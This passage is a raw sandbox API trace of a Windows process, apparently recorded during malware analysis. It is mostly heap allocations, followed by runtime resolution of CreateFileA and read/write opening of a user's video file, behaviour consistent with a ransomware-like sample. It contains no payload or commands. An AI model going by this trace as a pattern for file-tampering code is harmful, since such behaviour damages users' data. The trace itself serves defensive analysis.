lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0199.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0199.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0199.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0199.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0199.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0199.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0199.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0199.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0199.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0199.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0199.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0199.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0199.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0199.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0199.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0199.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0199.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0199.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0199.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0199.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0199.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0199.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0199.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0199.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0199.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0199.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0199.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0199.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0199.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0199.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0199.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0199.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0199.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0199.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0199.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0199.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0199.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0199.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0199.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0199.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0199.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0199.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0199.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0199.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0199.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0199.099] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0199.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0199.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0199.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0199.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0199.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0199.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0199.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0199.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0199.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0199.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0199.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0199.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0199.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0199.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0199.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0199.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0199.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0199.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0199.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0199.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0199.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0199.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0199.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0199.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0199.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0199.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0199.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0199.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0199.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0199.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0199.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0199.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0199.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0199.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0199.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0199.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0199.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0199.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0199.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0199.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0199.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0199.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0199.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0199.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0199.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0199.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0199.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0199.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0199.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0199.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0199.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0199.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0199.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0199.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0199.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0199.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0199.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0199.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0199.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0199.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0199.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0199.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0199.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0199.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0199.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0199.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0199.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0199.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0199.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0199.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0199.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0199.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0199.101] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0199.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0199.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0199.102] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0199.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9b9f58 [0199.102] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9b9f58, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0199.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0199.102] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0199.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0199.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0199.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0199.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0199.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0199.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0199.102] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0199.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9f58 [0199.102] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9b9f58, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0199.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0199.102] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0199.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0199.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0199.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0199.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0199.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0199.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0199.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0199.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0199.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0199.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0199.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0199.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0199.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0199.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AGaY9D6lmIb.mkv", cchWideChar=67, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 67 [0199.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x43) returned 0x9aa548 [0199.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AGaY9D6lmIb.mkv", cchWideChar=67, lpMultiByteStr=0x9aa548, cbMultiByte=67, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AGaY9D6lmIb.mkv", lpUsedDefaultChar=0x0) returned 67 [0199.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa548 | out: hHeap=0x8a0000) returned 1 [0199.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0199.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0199.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0199.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0199.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0199.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0199.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0199.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0199.103] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AGaY9D6lmIb.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z58zbpazzgtth\\agay9d6lmib.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0199.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0199.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0199.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0199.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0199.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0199.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0199.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0199.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0199.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0199.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0199.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0199.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0199.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0199.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0199.104] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=67, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 67 [0199.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x86) returned 0x8fecd8 [0199.104] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=67, lpWideCharStr=0x8fecd8, cchWideChar=67 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AGaY9D6lmIb.mkv") returned 67 [0199.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0199.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0199.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0199.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0199.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0199.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0199.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0199.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0199.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0199.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0199.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0199.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0199.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0199.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0199.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0199.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0199.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0199.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0199.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0199.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0199.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0199.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0199.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0199.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0199.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0199.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0199.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0199.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0199.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0199.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0199.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0199.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0199.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0199.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0199.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0199.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0199.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0199.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0199.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0199.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0199.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0199.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0199.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0199.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0199.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0199.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0199.106] 